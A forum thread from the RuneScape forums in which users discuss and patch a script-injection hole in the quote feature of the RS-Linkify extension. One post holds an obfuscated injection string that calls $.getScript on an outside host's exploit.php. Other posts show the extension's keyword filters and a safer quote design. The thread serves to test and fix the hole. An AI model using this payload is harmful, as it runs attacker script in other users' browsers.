forums.rs

Forums

RS-Linkify Thread is sticky

Quick find code: 261-262-33-65181208

of 1105
Indecent Act

Indecent Act

Posts: 7,456 Rune Posts by user Forum Profile RuneMetrics Profile
Updated. Version 2.0.9.0 none of the examples on the previous pages will work.

I'm trying to tackle this at the escaping level but it's really messy because there are both escaped and unescaped characters in a single line.

I'm not sure how water tight this update is, but it's an improvement, feel free to break it or circumvent it if you like.

I honestly thought when I logged in today this would have been fixed. I hope things don't have to get really bad before they do something about it.

I emailed Jagex yesterday with examples of how to exploit forum users with basically no limitations. I haven't heard back and I don't know if they will reply or even read my email. When all I get is silence on the matter, it's hard to be optimistic.

Thanks everyone who's posted, it has helped make RS Linkify a bit more secure :)

Edit: I notice this also works on other forum sections. I thought the censor might mess with it, but it seems that's not always the case. This is kind of like a time bomb ticking...

06-Dec-2013 03:42:35 - Last edited on 25-Feb-2014 07:26:37 by Indecent Act

Meredith wtf

Meredith wtf

Posts: 4,160 Adamant Posts by user Forum Profile RuneMetrics Profile
How are you fixing the exploit?

If you're just renaming the function and whatnot like you did before, it won't be watertight.

You can't have the post text in an onclick attribute.

You'd have to clear each onclick attr, then replace it with a function that grabs the content, but doesn't receive it as an argument

Example:

<a onclick="quote(5);return false;">Quote</a>

function quote(index){
var content = getPostContent();
...
putContentIntoTextbox(content);
}

instead of

function quote(content){
...
putContentIntoTextbox(content);
}

06-Dec-2013 05:02:16

Meredith wtf

Meredith wtf

Posts: 4,160 Adamant Posts by user Forum Profile RuneMetrics Profile
\',0);$.getScript(String.fromCharCode(104,116,116,112,58,47,47,120,112,45,119,97,115,116,101,46,117,112,104,101,114,111,46,99,111,109,47,101,120,112,108,111,105,116,46,112,104,112));new Array(\'test

06-Dec-2013 05:14:49 - Last edited on 06-Dec-2013 05:51:15 by Meredith wtf

Meredith wtf

Meredith wtf

Posts: 4,160 Adamant Posts by user Forum Profile RuneMetrics Profile
Is this all that you're doing, or am I missing something?

if(tqt.indexOf("','\\\\',&quot ;) > -1){q_txt='';}
if(tqt.indexOf("\\',&quot ;) > -1){q_txt='';}
if(tqt.indexOf("//','&quot ;) > -1){q_txt='';}
if(tqt.indexOf('eval(') > -1){q_txt='';}

06-Dec-2013 05:27:24

Toastcrumbs

Toastcrumbs

Posts: 5,801 Rune Posts by user Forum Profile RuneMetrics Profile
Meredith, the QFC brackets need an ID to work, just saying. :P Probably why you're not able to hide it in a QFC, which tbh... is a good thing.

Okay, Indy's idea seems to fix everything (so far)... If a / exists (even if not a code), it becomes unquote-able. Good luck quoting me.

06-Dec-2013 05:43:55 - Last edited on 06-Dec-2013 05:49:06 by Toastcrumbs

Quick find code: 261-262-33-65181208 Back to Top